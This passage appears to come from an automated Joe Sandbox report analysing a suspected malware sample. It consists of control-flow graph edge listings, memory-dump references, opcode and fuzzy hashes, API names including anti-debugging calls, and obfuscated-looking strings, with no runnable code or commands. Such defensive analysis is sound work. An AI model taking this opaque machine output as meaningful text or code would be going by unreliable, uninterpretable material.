7ff7645c2d2b-7ff7645c2d7d 43->62 44->1 45->1 46->1 63 7ff7645c2da6-7ff7645c2e08 call 7ff7645c1780 call 7ff7645c1330 46->63 60 7ff7645c2f30-7ff7645c2f36 48->60 49->1 65 7ff7645c2bd0-7ff7645c2bef call 7ff7645c1780 call 7ff7645c1330 49->65 51->1 52->1 67 7ff7645c2e31-7ff7645c2e67 call 7ff7645c92a0 52->67 53->1 54->1 72 7ff7645c33d5-7ff7645c33ec LoadLibraryA 55->72 73 7ff7645c317b-7ff7645c3180 55->73 69 7ff7645c31b2-7ff7645c31c9 call 7ff7645c92a0 56->69 70 7ff7645c3102-7ff7645c3107 56->70 57->1 58->1 74 7ff7645c2f60-7ff7645c2f66 60->74 75 7ff7645c2f38-7ff7645c2f3e 60->75 61->1 62->1 63->1 65->1 67->1 81 7ff7645c3310-7ff7645c3315 68->81 69->34 70->34 82 7ff7645c3109-7ff7645c3163 call 7ff7645c92a0 70->82 72->1 73->34 84 7ff7645c3186-7ff7645c31ad 73->84 88 7ff7645c2f90-7ff7645c2f94 74->88 89 7ff7645c2f68-7ff7645c2f6e 74->89 85 7ff7645c2f40-7ff7645c2f46 75->85 86 7ff7645c2f7f-7ff7645c2f8a 75->86 93 7ff7645c2fe0-7ff7645c2fe6 79->93 95 7ff7645c3350-7ff7645c3391 81->95 96 7ff7645c3317-7ff7645c331c 81->96 82->34 84->34 99 7ff7645c2f48-7ff7645c2f4e 85->99 100 7ff7645c2f8c-7ff7645c2f8e 85->100 86->60 88->60 102 7ff7645c2f70-7ff7645c2f76 89->102 103 7ff7645c2f96-7ff7645c2fa4 89->103 106 7ff7645c3020-7ff7645c3071 93->106 107 7ff7645c2fe8-7ff7645c2fee 93->107 95->68 108 7ff7645c3322-7ff7645c3327 96->108 109 7ff7645c33f1-7ff7645c341e call 7ff7645c3d80 96->109 99->60 113 7ff7645c2f50-7ff7645c33b3 99->113 100->60 102->60 114 7ff7645c2f78-7ff7645c2f7d 102->114 103->60 106->79 117 7ff7645c2ff4-7ff7645c2ffa 107->117 118 7ff7645c33b8-7ff7645c33d0 107->118 108->81 110 7ff7645c3329-7ff7645c3345 108->110 109->1 110->81 113->1 114->60 117->93 122 7ff7645c2ffc-7ff7645c301e 117->122 118->1 122->93
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.259441510.00007FF7645B1000.00000020.00020000.sdmp, Offset: 00007FF7645B0000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.259437863.00007FF7645B0000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259480757.00007FF764618000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259484471.00007FF76461C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259487507.00007FF764620000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7ff7645b0000_fdcbn.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 1c87331c0881569db75b19522a25c1094bb3e97912cb1928a03d6313d9c7b85a
                                                                                                      • Instruction ID: ec9bca5b482bd27e750f9c8a3f1dd247763d0c82a48163552db06522816208cf
                                                                                                      • Opcode Fuzzy Hash: 1c87331c0881569db75b19522a25c1094bb3e97912cb1928a03d6313d9c7b85a
                                                                                                      • Instruction Fuzzy Hash: 8D223B22B0C646C7DA38AE16A4E03BDB7E1AB84354F94553DE55E47BD6CE2CD8048F70
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • RtlAllocateHeap.NTDLL(?,?,00000000,00007FF7646065C9,?,?,00001AFB4450AA70,00007FF764607DA5,?,?,?,?,00007FF76460C60E,?,?,00000000), ref: 00007FF764607EC9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.259441510.00007FF7645B1000.00000020.00020000.sdmp, Offset: 00007FF7645B0000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.259437863.00007FF7645B0000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259480757.00007FF764618000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259484471.00007FF76461C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259487507.00007FF764620000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7ff7645b0000_fdcbn.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocateHeap
                                                                                                      • String ID:
                                                                                                      • API String ID: 1279760036-0
                                                                                                      • Opcode ID: a848e5b76b04e00eb80e14f843c19a73d01effaed5581444aff6cfb2a45b3c67
                                                                                                      • Instruction ID: 7eadf6d5c431bed65b8804d118051b4c106fa1f5b206da945cf17e8221021c60
                                                                                                      • Opcode Fuzzy Hash: a848e5b76b04e00eb80e14f843c19a73d01effaed5581444aff6cfb2a45b3c67
                                                                                                      • Instruction Fuzzy Hash: F4F04954B1A207C1FE597E679A993B5D2935F98F81FCC4431890E862C2EE6CAC814230
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • RtlAllocateHeap.NTDLL(?,?,?,00007FF76460C5F5,?,?,00000000,00007FF764609E0B,?,?,?,00007FF764604C4F,?,?,?,00007FF764604E85), ref: 00007FF76460801E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.259441510.00007FF7645B1000.00000020.00020000.sdmp, Offset: 00007FF7645B0000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.259437863.00007FF7645B0000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259480757.00007FF764618000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259484471.00007FF76461C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259487507.00007FF764620000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7ff7645b0000_fdcbn.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocateHeap
                                                                                                      • String ID:
                                                                                                      • API String ID: 1279760036-0
                                                                                                      • Opcode ID: e560f71d711a42c921ed84ded2670af9cf3bdff0e3df86ac959cba17ee8e59ba
                                                                                                      • Instruction ID: 72d427114c67c2fdb53402e2d7477a392291a55681c4fc68d2bbacaa31e24205
                                                                                                      • Opcode Fuzzy Hash: e560f71d711a42c921ed84ded2670af9cf3bdff0e3df86ac959cba17ee8e59ba
                                                                                                      • Instruction Fuzzy Hash: 0BF01210B19603C1FE55BE775AD9275E2925F44FB1FC84634DD2F863D1DE6CA8415130
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Non-executed Functions

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.259441510.00007FF7645B1000.00000020.00020000.sdmp, Offset: 00007FF7645B0000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.259437863.00007FF7645B0000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259480757.00007FF764618000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259484471.00007FF76461C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259487507.00007FF764620000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7ff7645b0000_fdcbn.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 8kw$8kw$8kw$fXX/$fXX/$m$$m$$m$$m$$"$"$"$_'`$_'`$_'`$_'`
                                                                                                      • API String ID: 0-2240776620
                                                                                                      • Opcode ID: 523e2701aab27cf7409d3b749ef667c0892d8a874a1d31b72cb2c71531813be0
                                                                                                      • Instruction ID: 3f012708029cf6a9cd60df54f977ca941f436cc6bb54e6d999c09311488f9fd5
                                                                                                      • Opcode Fuzzy Hash: 523e2701aab27cf7409d3b749ef667c0892d8a874a1d31b72cb2c71531813be0
                                                                                                      • Instruction Fuzzy Hash: 62B23936A0D281CBDA789F29A5D067EF7E2DB85304F54003AD69A87FD5DA2CD841CF11
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.259441510.00007FF7645B1000.00000020.00020000.sdmp, Offset: 00007FF7645B0000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.259437863.00007FF7645B0000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259480757.00007FF764618000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259484471.00007FF76461C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259487507.00007FF764620000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7ff7645b0000_fdcbn.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 0ah[$1ah[$1ah[$1ah[$@$VoFH$VoFH$vqn$wqn$wqn$wqn$Z&P$Z&P
                                                                                                      • API String ID: 0-976493462
                                                                                                      • Opcode ID: 4d842f51b37ac6528e37aaf4ff80dd3c470563f7162ff4ba5b5de4bbcc2c35e2
                                                                                                      • Instruction ID: 840c44b5e86a407be8d378415a82731003a8099afe29f3e9c5a84badb0f77cdb
                                                                                                      • Opcode Fuzzy Hash: 4d842f51b37ac6528e37aaf4ff80dd3c470563f7162ff4ba5b5de4bbcc2c35e2
                                                                                                      • Instruction Fuzzy Hash: A4033B26B08286CBEB6C9F7684E03BD7791EF44354FA4013ADA0F4BBD6CE2C99418755
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 906 7ff7645b8800-7ff7645b885b 907 7ff7645b8870-7ff7645b8876 906->907 908 7ff7645b88f0-7ff7645b88f6 907->908 909 7ff7645b8878-7ff7645b887e 907->909 912 7ff7645b89c0-7ff7645b89c6 908->912 913 7ff7645b88fc-7ff7645b8902 908->913 910 7ff7645b8980-7ff7645b8986 909->910 911 7ff7645b8884-7ff7645b888a 909->911 920 7ff7645b8a82-7ff7645b8a88 910->920 921 7ff7645b898c-7ff7645b8992 910->921 914 7ff7645b8890-7ff7645b8896 911->914 915 7ff7645b89fa-7ff7645b8a00 911->915 916 7ff7645b8ad5-7ff7645b8adb 912->916 917 7ff7645b89cc-7ff7645b89d2 912->917 918 7ff7645b8a50-7ff7645b8a56 913->918 919 7ff7645b8908-7ff7645b890e 913->919 926 7ff7645b8b43-7ff7645b8b49 914->926 927 7ff7645b889c-7ff7645b88a2 914->927 932 7ff7645b8a06-7ff7645b8a0c 915->932 933 7ff7645b8c24-7ff7645b8c2a 915->933 930 7ff7645b8d02-7ff7645b8d08 916->930 931 7ff7645b8ae1-7ff7645b8ae7 916->931 928 7ff7645b8c02-7ff7645b8c08 917->928 929 7ff7645b89d8-7ff7645b89de 917->929 936 7ff7645b8c6a-7ff7645b8c70 918->936 937 7ff7645b8a5c-7ff7645b8a62 918->937 934 7ff7645b8b91-7ff7645b8b97 919->934 935 7ff7645b8914-7ff7645b891a 919->935 924 7ff7645b8ce0-7ff7645b8ce6 920->924 925 7ff7645b8a8e-7ff7645b8a94 920->925 922 7ff7645b8bd0-7ff7645b8bd6 921->922 923 7ff7645b8998-7ff7645b899e 921->923 956 7ff7645b8f27-7ff7645b8f5e 922->956 957 7ff7645b8bdc-7ff7645b8be2 922->957 954 7ff7645b8d41-7ff7645b8d6c 923->954 955 7ff7645b89a4-7ff7645b89aa 923->955 938 7ff7645b8fb0-7ff7645b8fde 924->938 939 7ff7645b8cec-7ff7645b8cf2 924->939 940 7ff7645b8e15-7ff7645b8e43 925->940 941 7ff7645b8a9a-7ff7645b8aa0 925->941 950 7ff7645b8b4f-7ff7645b8b55 926->950 951 7ff7645b8ec9-7ff7645b8ef7 926->951 942 7ff7645b901f-7ff7645b9032 927->942 943 7ff7645b88a8-7ff7645b88ae 927->943 958 7ff7645b8f6e-7ff7645b8f76 928->958 959 7ff7645b8c0e-7ff7645b8c14 928->959 960 7ff7645b89e4-7ff7645b89ea 929->960 961 7ff7645b8d7c-7ff7645b8da8 929->961 944 7ff7645b8ff5-7ff7645b901a GetProcessHeap HeapReAlloc 930->944 945 7ff7645b8d0e-7ff7645b8d14 930->945 946 7ff7645b8e5a-7ff7645b8ea9 GetProcessHeap HeapReAlloc 931->946 947 7ff7645b8aed-7ff7645b8af3 931->947 964 7ff7645b8a12-7ff7645b8a18 932->964 965 7ff7645b8db1-7ff7645b8dc0 932->965 962 7ff7645b8c30-7ff7645b8c36 933->962 963 7ff7645b8f7b-7ff7645b8f94 GetProcessHeap HeapAlloc 933->963 952 7ff7645b8f02-7ff7645b8f17 934->952 953 7ff7645b8b9d-7ff7645b8ba3 934->953 948 7ff7645b8920-7ff7645b8926 935->948 949 7ff7645b8d27-7ff7645b8d31 935->949 966 7ff7645b8c76-7ff7645b8c7c 936->966 967 7ff7645b8f99-7ff7645b8fab 936->967 968 7ff7645b8dc5-7ff7645b8dfb 937->968 969 7ff7645b8a68-7ff7645b8a6e 937->969 971 7ff7645b8fe0 938->971 972 7ff7645b8fe5-7ff7645b8ff0 938->972 939->907 981 7ff7645b8cf8-7ff7645b8cfd 939->981 992 7ff7645b8e45 940->992 993 7ff7645b8e4a-7ff7645b8e55 940->993 941->907 973 7ff7645b8aa6-7ff7645b8ad0 941->973 943->907 982 7ff7645b88b0-7ff7645b88dc 943->982 944->907 945->907 983 7ff7645b8d1a-7ff7645b8d22 945->983 994 7ff7645b8eb0-7ff7645b8ec4 946->994 995 7ff7645b8eab 946->995 947->907 974 7ff7645b8af9-7ff7645b8b27 947->974 948->907 987 7ff7645b892c-7ff7645b8963 948->987 949->907 984 7ff7645b8d37-7ff7645b8d3c 949->984 950->907 975 7ff7645b8b5b-7ff7645b8b8c 950->975 951->971 997 7ff7645b8efd 951->997 952->907 998 7ff7645b8f1d-7ff7645b8f22 952->998 953->907 976 7ff7645b8ba9-7ff7645b8bcb 953->976 985 7ff7645b8d72-7ff7645b8d77 954->985 986 7ff7645b885d-7ff7645b886b 954->986 955->907 991 7ff7645b89b0-7ff7645b89b5 955->991 956->986 1000 7ff7645b8f64-7ff7645b8f69 956->1000 957->907 977 7ff7645b8be8-7ff7645b8bf2 957->977 958->907 959->907 978 7ff7645b8c1a-7ff7645b8c1f 959->978 960->907 996 7ff7645b89f0-7ff7645b89f5 960->996 988 7ff7645b8e02-7ff7645b8e10 961->988 989 7ff7645b8daa-7ff7645b8daf 961->989 962->907 979 7ff7645b8c3c-7ff7645b8c54 962->979 963->907 964->907 999 7ff7645b8a1e-7ff7645b8a40 964->999 965->907 966->907 980 7ff7645b8c82-7ff7645b8cc4 GetProcessHeap HeapAlloc 966->980 967->907 968->988 990 7ff7645b8dfd 968->990 969->907 970 7ff7645b8a74-7ff7645b8a7d 969->970 970->907 971->972 972->907 973->907 1001 7ff7645b8b29 974->1001 1002 7ff7645b8b2e-7ff7645b8b3e 974->1002 975->907 976->907 977->907 1003 7ff7645b8bf8-7ff7645b8bfd 977->1003 978->907 1004 7ff7645b8c56 979->1004 1005 7ff7645b8c5b-7ff7645b8c65 979->1005 1006 7ff7645b8cc6 980->1006 1007 7ff7645b8ccb-7ff7645b8cdb 980->1007 981->907 982->986 1008 7ff7645b88e2 982->1008 983->907 984->907 985->986 986->907 987->907 1009 7ff7645b8969-7ff7645b896e 987->1009 988->907 989->988 990->988 991->907 992->993 993->907 994->907 995->994 996->907 997->972 998->907 999->907 1010 7ff7645b8a46-7ff7645b8a4b 999->1010 1000->986 1001->1002 1002->907 1003->907 1004->1005 1005->907 1006->1007 1007->907 1008->985 1009->907 1010->907
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.259441510.00007FF7645B1000.00000020.00020000.sdmp, Offset: 00007FF7645B0000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.259437863.00007FF7645B0000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259480757.00007FF764618000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259484471.00007FF76461C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259487507.00007FF764620000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7ff7645b0000_fdcbn.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: |NN$}NN$}NN
                                                                                                      • API String ID: 0-3985159218
                                                                                                      • Opcode ID: b734ec7cdc21db5007f651ec29c333b3b6802e37ba45ee6c4a8f7dde44e99af9
                                                                                                      • Instruction ID: 5f3dd0a7c708e2609fc7f468de29ad9ec5189a1affa8a6c68cf091931f167d17
                                                                                                      • Opcode Fuzzy Hash: b734ec7cdc21db5007f651ec29c333b3b6802e37ba45ee6c4a8f7dde44e99af9
                                                                                                      • Instruction Fuzzy Hash: 85122D36A0C743C7E6289F1690F013DB3E2AF94790FA45639E95E477E5CE3CE8448612
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1011 7ff7645b9c00-7ff7645b9c39 1012 7ff7645b9c80-7ff7645b9c85 1011->1012 1013 7ff7645b9d00-7ff7645b9d05 1012->1013 1014 7ff7645b9c87-7ff7645b9c8c 1012->1014 1017 7ff7645b9d80-7ff7645b9d85 1013->1017 1018 7ff7645b9d07-7ff7645b9d0c 1013->1018 1015 7ff7645b9c92-7ff7645b9c97 1014->1015 1016 7ff7645b9d40-7ff7645b9d45 1014->1016 1023 7ff7645b9de1-7ff7645b9de6 1015->1023 1024 7ff7645b9c9d-7ff7645b9ca2 1015->1024 1019 7ff7645b9e2a-7ff7645b9e2f 1016->1019 1020 7ff7645b9d4b-7ff7645b9d50 1016->1020 1021 7ff7645b9e86-7ff7645b9e8b 1017->1021 1022 7ff7645b9d8b-7ff7645b9d90 1017->1022 1025 7ff7645b9d12-7ff7645b9d17 1018->1025 1026 7ff7645b9e05-7ff7645b9e0a 1018->1026 1041 7ff7645b9e35-7ff7645b9e3a 1019->1041 1042 7ff7645ba01d-7ff7645ba022 1019->1042 1027 7ff7645b9d56-7ff7645b9d5b 1020->1027 1028 7ff7645b9f97-7ff7645b9fa9 1020->1028 1029 7ff7645b9e91-7ff7645b9e96 1021->1029 1030 7ff7645ba027-7ff7645ba064 1021->1030 1031 7ff7645b9d96-7ff7645b9d9b 1022->1031 1032 7ff7645b9fae-7ff7645b9fc8 1022->1032 1035 7ff7645b9dec-7ff7645b9df1 1023->1035 1036 7ff7645b9c3b-7ff7645b9c66 1023->1036 1033 7ff7645b9ca8-7ff7645b9cad 1024->1033 1034 7ff7645b9edd-7ff7645b9ee5 1024->1034 1039 7ff7645b9f39-7ff7645b9f7b 1025->1039 1040 7ff7645b9d1d-7ff7645b9d22 1025->1040 1037 7ff7645b9e10-7ff7645b9e15 1026->1037 1038 7ff7645b9fcd-7ff7645ba018 1026->1038 1027->1012 1043 7ff7645b9d61-7ff7645b9d75 1027->1043 1028->1012 1029->1012 1049 7ff7645b9e9c-7ff7645b9ed8 1029->1049 1030->1012 1031->1012 1044 7ff7645b9da1-7ff7645b9ddc 1031->1044 1032->1012 1050 7ff7645b9cb3-7ff7645b9cb8 1033->1050 1051 7ff7645b9eea-7ff7645b9f34 1033->1051 1034->1012 1035->1012 1045 7ff7645b9df7-7ff7645b9e00 1035->1045 1048 7ff7645b9c6b-7ff7645b9c76 1036->1048 1037->1012 1046 7ff7645b9e1b-7ff7645b9e25 1037->1046 1038->1012 1039->1012 1052 7ff7645b9f80-7ff7645b9f92 1040->1052 1053 7ff7645b9d28-7ff7645b9d2d 1040->1053 1041->1012 1047 7ff7645b9e40-7ff7645b9e81 1041->1047 1042->1012 1043->1012 1044->1012 1045->1012 1046->1012 1047->1012 1048->1012 1049->1012 1050->1012 1054 7ff7645b9cba-7ff7645b9cf6 1050->1054 1051->1012 1052->1012 1053->1012 1055 7ff7645b9d33-7ff7645ba07c 1053->1055 1054->1048
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.259441510.00007FF7645B1000.00000020.00020000.sdmp, Offset: 00007FF7645B0000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.259437863.00007FF7645B0000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259480757.00007FF764618000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259484471.00007FF76461C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259487507.00007FF764620000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7ff7645b0000_fdcbn.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: I8$I8$I8$F2?$F2?$F2?$F2?$F2?
                                                                                                      • API String ID: 0-1409480241
                                                                                                      • Opcode ID: ab074b1ef08b8673696a6721944cb53423c8ac9a1abc800326301b6e894b7611
                                                                                                      • Instruction ID: a386a36b5462bd472e9b1977ac5c134611dc68bb1a8df1cbacbf0ee293b71b11
                                                                                                      • Opcode Fuzzy Hash: ab074b1ef08b8673696a6721944cb53423c8ac9a1abc800326301b6e894b7611
                                                                                                      • Instruction Fuzzy Hash: F1A15EA6B0D102C7EA61DE2B98D047DB3D1AFD1720FA58631D914C72E5CA3CEC429B90
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.259441510.00007FF7645B1000.00000020.00020000.sdmp, Offset: 00007FF7645B0000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.259437863.00007FF7645B0000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259480757.00007FF764618000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259484471.00007FF76461C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259487507.00007FF764620000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7ff7645b0000_fdcbn.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 1239891234-0
                                                                                                      • Opcode ID: b501a94b0c30ddd3ed342116c16bde973fb161cf99d96f5608dad720b87bbcde
                                                                                                      • Instruction ID: 12839781a987f7ae13af2995e6edea04d4d44f111348091598d3b9d2fae7b0cf
                                                                                                      • Opcode Fuzzy Hash: b501a94b0c30ddd3ed342116c16bde973fb161cf99d96f5608dad720b87bbcde
                                                                                                      • Instruction Fuzzy Hash: 48317432608F81C6D764DF2AE8846AEB3A5FB84B55F900136EA9D43B95DF3CC545C710
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.259441510.00007FF7645B1000.00000020.00020000.sdmp, Offset: 00007FF7645B0000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.259437863.00007FF7645B0000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259480757.00007FF764618000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259484471.00007FF76461C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259487507.00007FF764620000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7ff7645b0000_fdcbn.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 3a*c%eUg$OY>m$PY>m$PY>m$Pi^k$lm
                                                                                                      • API String ID: 0-628547131
                                                                                                      • Opcode ID: ba3b8414c5dcf767e0dfa7b6adefc33b7c8e6bff351b12595a6cb83dcc1093b8
                                                                                                      • Instruction ID: df9d9abe7ec3ececb57b3c15836721495932a5a7d105204b5b80ecc5322fdcc9
                                                                                                      • Opcode Fuzzy Hash: ba3b8414c5dcf767e0dfa7b6adefc33b7c8e6bff351b12595a6cb83dcc1093b8
                                                                                                      • Instruction Fuzzy Hash: 6C41492271824587EB14AF2AB8D176BB6A1AFC1B94F944135FE8D87B95CE3CD4428B10
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1178 7ff7645b7350-7ff7645b73b0 1179 7ff7645b73f0-7ff7645b73f6 1178->1179 1180 7ff7645b7460-7ff7645b7466 1179->1180 1181 7ff7645b73f8-7ff7645b73fe 1179->1181 1184 7ff7645b7530-7ff7645b7536 1180->1184 1185 7ff7645b746c-7ff7645b7472 1180->1185 1182 7ff7645b74e0-7ff7645b74e6 1181->1182 1183 7ff7645b7404-7ff7645b740a 1181->1183 1192 7ff7645b7650-7ff7645b7656 1182->1192 1193 7ff7645b74ec-7ff7645b74f2 1182->1193 1186 7ff7645b7410-7ff7645b7416 1183->1186 1187 7ff7645b75b9-7ff7645b75bf 1183->1187 1188 7ff7645b7778-7ff7645b777e 1184->1188 1189 7ff7645b753c-7ff7645b7542 1184->1189 1190 7ff7645b7622-7ff7645b7628 1185->1190 1191 7ff7645b7478-7ff7645b747e 1185->1191 1196 7ff7645b77a6-7ff7645b77ac 1186->1196 1197 7ff7645b741c-7ff7645b7422 1186->1197 1204 7ff7645b75c5-7ff7645b75cb 1187->1204 1205 7ff7645b7a7a-7ff7645b7abf call 7ff7645c92a0 call 7ff7645b85b0 1187->1205 1200 7ff7645b7bd0-7ff7645b7c1d call 7ff7645c92a0 1188->1200 1201 7ff7645b7784-7ff7645b778a 1188->1201 1202 7ff7645b73b2-7ff7645b73dc 1189->1202 1203 7ff7645b7548-7ff7645b754e 1189->1203 1208 7ff7645b7b1d-7ff7645b7b35 call 7ff7645b85b0 1190->1208 1209 7ff7645b762e-7ff7645b7634 1190->1209 1206 7ff7645b7484-7ff7645b748a 1191->1206 1207 7ff7645b77d9-7ff7645b77de 1191->1207 1198 7ff7645b7b84-7ff7645b7bae call 7ff7645b5c00 1192->1198 1199 7ff7645b765c-7ff7645b7662 1192->1199 1194 7ff7645b7812-7ff7645b78d3 call 7ff7645c92a0 call 7ff7645ff080 1193->1194 1195 7ff7645b74f8-7ff7645b74fe 1193->1195 1279 7ff7645b78d7 call 7ff7645b7c90 1194->1279 1220 7ff7645b7994-7ff7645b79be 1195->1220 1221 7ff7645b7504-7ff7645b750a 1195->1221 1227 7ff7645b77b2-7ff7645b77b8 1196->1227 1228 7ff7645b7c2c-7ff7645b7c48 1196->1228 1212 7ff7645b77c3-7ff7645b77d4 1197->1212 1213 7ff7645b7428-7ff7645b742e 1197->1213 1198->1179 1214 7ff7645b7bb3-7ff7645b7bcb call 7ff7645b85b0 1199->1214 1215 7ff7645b7668-7ff7645b766e 1199->1215 1200->1179 1223 7ff7645b7c22-7ff7645b7c27 1201->1223 1224 7ff7645b7790-7ff7645b7796 1201->1224 1232 7ff7645b73e1 1202->1232 1225 7ff7645b7554-7ff7645b755a 1203->1225 1226 7ff7645b79d9-7ff7645b7a75 call 7ff7645c92a0 1203->1226 1230 7ff7645b75d1-7ff7645b75d7 1204->1230 1231 7ff7645b7ac4-7ff7645b7b18 call 7ff7645c92a0 1204->1231 1205->1179 1217 7ff7645b7490-7ff7645b7496 1206->1217 1218 7ff7645b77e3-7ff7645b780d 1206->1218 1207->1179 1208->1179 1210 7ff7645b7b3a-7ff7645b7b7f call 7ff7645b9040 1209->1210 1211 7ff7645b763a-7ff7645b7640 1209->1211 1250 7ff7645b7c4d-7ff7645b7c5b 1210->1250 1211->1179 1235 7ff7645b7646-7ff7645b764b 1211->1235 1212->1179 1213->1179 1237 7ff7645b7430-7ff7645b745a call 7ff7645b9040 1213->1237 1214->1179 1215->1179 1238 7ff7645b7674-7ff7645b7773 call 7ff764602cb0 * 5 call 